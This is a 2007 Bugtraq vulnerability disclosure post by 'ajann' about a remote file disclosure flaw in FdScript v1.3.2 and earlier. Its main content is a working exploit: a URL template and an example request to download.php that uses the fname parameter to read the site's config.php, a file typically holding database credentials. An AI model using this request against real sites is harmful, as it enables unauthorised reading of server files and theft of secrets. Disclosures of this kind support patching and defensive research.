
Date: 26 Jan 2007 20:12:11 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: FdScript <= v1.3.2 Remote File Disclosure Vulnerability

*******************************************************************************
# Title   :  FdScript <= v1.3.2 Remote File Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(
# Site    :  http://stud.usv.ro/~vlad_l/
# $$      :  Free

*******************************************************************************

[[SOURCE]]]---------------------------------------------------------

http://[target]/[path]//download.php?fname=[SOURCE FILE]

Example:

//download.php?fname=./indexfiles/config.php
[[/SOURCE]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!
